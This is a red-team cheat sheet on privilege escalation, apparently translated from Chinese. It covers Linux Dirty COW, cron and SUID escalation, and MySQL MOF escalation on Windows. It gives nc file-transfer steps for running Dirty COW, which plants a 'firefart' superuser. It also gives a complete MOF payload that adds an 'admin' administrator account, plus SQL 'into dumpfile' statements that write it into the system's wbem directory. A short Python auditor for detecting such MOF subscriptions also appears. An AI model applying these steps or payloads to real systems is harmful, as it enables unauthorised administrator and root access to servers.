Privilege Escalation

一、Common Linux privilege escalation

黑白之道 (Heibai Zhidao), "A summary of Linux privilege escalation for red team testing": https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA

  1. Kernel vulnerabilities

  2. Cron jobs

  3. SUID files

  4. Sudo misconfiguration

  5. NFS shares

  6. Third-party services

1、Linux kernel privilege escalation vulnerability: "Dirty COW"

Helper tool: https://github.com/mzet-/linux-exploit-suggester

1、Victim: `nc -l 2333 > 获得脚本.py`
2、Attacker: `nc 小可怜IP 2333 < 送过去脚本.py`
3、The victim runs the script, which reports the Dirty COW vulnerability [CVE-2016-5195] dirtycow.
4、`searchsploit dirty Cow` # search the attacker's local exploit-db database to obtain the Dirty COW exp
5、Send it over with nc in the same way.
6、The victim compiles and runs it. It asks you to enter a password, then successfully tampers with /etc/passwd, adding a superuser named firefart and backing up the original as /etc/passwd.bak; when it finishes, the script reminds you to run `mv /etc/passwd.bak /etc/passwd` to restore the original state.

2、Cron jobs

pspy process-monitoring helper tool: https://github.com/DominicBreuker/pspy

3、SUID privilege escalation

LinEnum.py: https://github.com/rebootuser/LinEnum

二、MySQL privilege escalation

1、MOF file privilege escalation

mof is a Windows system file located at c:\windows\system32\wbem\mof\nullevt.mof. It is called Managed Object Format, and its role is to monitor process creation and termination every 5 seconds. The simple MOF privilege escalation process is: once you hold MySQL root privileges, use root to perform an upload and write our rewritten mof file; the server then executes this file every 5 seconds with SYSTEM privileges. The rewritten mof contains a section of vbs script, and that vbs is usually a cmd command that adds an administrator user.

The fundamental reason escalation is possible is that a thread with higher privileges executes the command. Here the nullevt.mof file is loaded by the SYSTEM user, so the highest level we can raise the user's privileges to is SYSTEM.

Conditions for exploitation

  • Windows version <= 2003
  • the c:\windows\system32\wbem\mof directory is writable
  • the database allows remote connections, and the root account password is known

Exploit code

```
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter{ EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
```

The key is line 14, "net.exe user admin admin /add", which creates a user named admin with the password admin. Once that user is created, change the command to "net.exe localgroup administrators admin /add" and upload the file again, so that the admin user is created and then added to the administrators group.
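As a defensive counterpart to the MOF above, here is an added example (not code from the original post or from any project): a small Python auditor that parses a MOF file's instance blocks, resolves each __FilterToConsumerBinding to its filter and consumer, and flags consumers whose ScriptText or CommandLineTemplate spawns a process or edits local accounts. The sample MOF, the indicator list and the function names are constructed for this example.

```python
import re
# Constructed sample, not a file from the page: the subscription-style MOF described above.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{ EventNamespace = "Root\\Cimv2"; Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
  QueryLanguage = "WQL"; };
instance of ActiveScriptEventConsumer as $Consumer
{ Name = "consPCSV2"; ScriptingEngine = "JScript";
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; };
instance of __FilterToConsumerBinding
{ Consumer = $Consumer; Filter = $EventFilter; };
'''

INSTANCE_RE = re.compile(r'instance of (\w+)(?: as \$(\w+))?\s*\{(.*?)\};', re.S)
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:\\.|[^"\\])*"\s*)+|\$\w+)\s*;', re.S)
STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
# Substrings meaning the consumer spawns a process or edits local accounts (hypothetical list).
INDICATORS = ("wscript.shell", ".run(", "net.exe", "net user", "localgroup", "cmd", "powershell")
CONSUMER_CLASSES = ("ActiveScriptEventConsumer", "CommandLineEventConsumer")

def parse_mof(text):
    # Each 'instance of' block -> {class, alias, props}; adjacent string literals concatenate, escapes decoded.
    instances = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        props = {}
        for key, raw in PROP_RE.findall(body):
            if raw.startswith('"'):
                joined = "".join(STRING_RE.findall(raw))
                raw = re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), joined)
            props[key] = raw
        instances.append({"class": cls, "alias": alias, "props": props})
    return instances

def audit(text):
    # Resolve each __FilterToConsumerBinding; flag consumers whose payload runs code.
    insts = parse_mof(text)
    by_alias = {"$" + i["alias"]: i for i in insts if i["alias"]}
    findings = []
    for inst in insts:
        if inst["class"] != "__FilterToConsumerBinding": continue
        cons = by_alias.get(inst["props"].get("Consumer"), {"class": "", "props": {}})
        filt = by_alias.get(inst["props"].get("Filter"), {"props": {}})
        if cons["class"] not in CONSUMER_CLASSES: continue
        payload = cons["props"].get("ScriptText", "") + cons["props"].get("CommandLineTemplate", "")
        if hits := [s for s in INDICATORS if s in payload.lower()]:
            findings.append({"consumer": cons["props"].get("Name"), "engine": cons["props"].get("ScriptingEngine"),
                             "trigger": filt["props"].get("Query"), "indicators": hits})
    return findings
```

Running `audit()` over the .mof files in the wbem\mof directory, or over MOF text recovered from a compiled subscription, gives the trigger query and the indicators behind each finding, which is what an analyst needs to decide whether a binding is legitimate.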

Exploitation process

0x0、When you already have a webshell on the site

If you already have a webshell on the site, upload the nullevt.mof file to a writable directory xxx on the C drive, then run the SQL statement below:

```sql
select load_file('c:\\xxx\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
```

Note the difference between dumpfile and outfile here: into outfile automatically adds newlines and similar formatting, which suits text files but not code, because the extra data would cause our command execution to fail. into dumpfile writes the file as raw binary, so we use into dumpfile here.

0x1、When you do not have a webshell on the site

Without a webshell, we can connect to the database and write the file directly: convert the code to ASCII codes and pass them in as-is.

```sql
select char(...) into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
```

2、UDF privilege escalation

Recommended blog post: https://www.cnblogs.com/litlife/p/9030673.html
